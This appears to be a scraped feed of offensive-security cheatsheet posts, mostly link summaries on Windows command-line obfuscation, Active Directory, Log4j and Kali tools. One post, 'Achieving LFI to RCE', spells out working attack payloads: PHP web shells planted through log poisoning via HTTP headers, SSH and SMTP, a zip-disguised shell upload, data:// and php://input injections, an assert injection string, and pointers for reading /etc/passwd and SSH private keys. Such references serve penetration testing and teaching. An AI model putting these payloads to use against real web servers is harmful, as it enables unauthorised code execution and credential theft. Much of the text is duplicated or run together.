Windows Command-Line Obfuscation
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.
# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
#cheatsheet #cmd #pentest
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.
# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
#cheatsheet #cmd #pentest
www.wietzebeukema.nl
Windows Command-Line Obfuscation
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due…
OFFENSIVE SECURITY CHEATSHEET
— Open Source Intelligence (OSINT)
— Web Pentest
— Network
— Shells methods
— Windows Systems
— Linux Systems
— Other Systems
— Passcracking Hash & Files
— Phishing, RedTeam and SE
— Wireless
— Cryptography
— Pwn
— External Resources
https://cheatsheet.haax.fr/
#cheatsheet #pentest #osint #ad
— Open Source Intelligence (OSINT)
— Web Pentest
— Network
— Shells methods
— Windows Systems
— Linux Systems
— Other Systems
— Passcracking Hash & Files
— Phishing, RedTeam and SE
— Wireless
— Cryptography
— Pwn
— External Resources
https://cheatsheet.haax.fr/
#cheatsheet #pentest #osint #ad
Active Directory Penetration Testing Cheatsheet
https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff
#AD #pentest #cheatsheet
https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff
#AD #pentest #cheatsheet
Kali Linux Tools Page
Now you can learn more about all the tools that you can install in Kali.
https://kali.org/tools/
#tools #cheatsheet #kali
Now you can learn more about all the tools that you can install in Kali.
https://kali.org/tools/
#tools #cheatsheet #kali
Blue Team Notes
A collection of one-liners, small scripts, and some useful tips for blue team work.
https://github.com/Purp1eW0lf/Blue-Team-Notes
#blueteam #cheatsheet
A collection of one-liners, small scripts, and some useful tips for blue team work.
https://github.com/Purp1eW0lf/Blue-Team-Notes
#blueteam #cheatsheet
GitHub
GitHub - Purp1eW0lf/Blue-Team-Notes: You didn't think I'd go and leave the blue team out, right?
You didn't think I'd go and leave the blue team out, right? - GitHub - Purp1eW0lf/Blue-Team-Notes: You didn't think I'd go and leave the blue team out, right?
Windows Privileges
https://speakerdeck.com/fr0gger/windows-privileges
#windows #privileges #cheatsheet
https://speakerdeck.com/fr0gger/windows-privileges
#windows #privileges #cheatsheet
Achieving LFI to RCE
1. Apache Log Poisoning
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
7. Zip upload
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
10. expect://
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
13. Log files
14. Via PHP sessions
https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
15. Via SSH
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa
16. vsftpd Log Poisoning
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
17. Automation
https://github.com/D35m0nd142/LFISuite
#lfi #rce #cheatsheet
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
2. SSH Log Poisoningssh '<?php system($_GET['c'])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls
3. SMTP Log Poisoningtelnet target(.)com 25
MAIL FROM:<test@example.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
4. Image Uploadexiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
/show.php?file=../img.jpg&c=ls
5. /proc/self/environGET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
6. php://filterRead source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
8. data://text/plain/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
9. /proc/self/fd/{id}Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
10. expect://
/show.php?page=expect://ls
11. input://POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
12. RCE via vulnerable assert statementVulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
13. Log files
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)14. Via PHP sessions
https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
15. Via SSH
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa
16. vsftpd Log Poisoning
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
17. Automation
https://github.com/D35m0nd142/LFISuite
#lfi #rce #cheatsheet
👍1
Bug Bounty Tip — Log4j Vulnerability Cheatsheet
— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)
#log4j #cheatsheet #bugbounty
— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)
#log4j #cheatsheet #bugbounty
❤1
Active Directory Checklist — Attack & Defense Cheatsheet
https://cybersecuritynews.com/active-directory-checklist/
#ad #cheatsheet #redteam #blueteam
https://cybersecuritynews.com/active-directory-checklist/
#ad #cheatsheet #redteam #blueteam
Cyber Security News
Active Directory Attack Kill Chain Checklist & Tools List- 2025
Here we are elaborating the tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance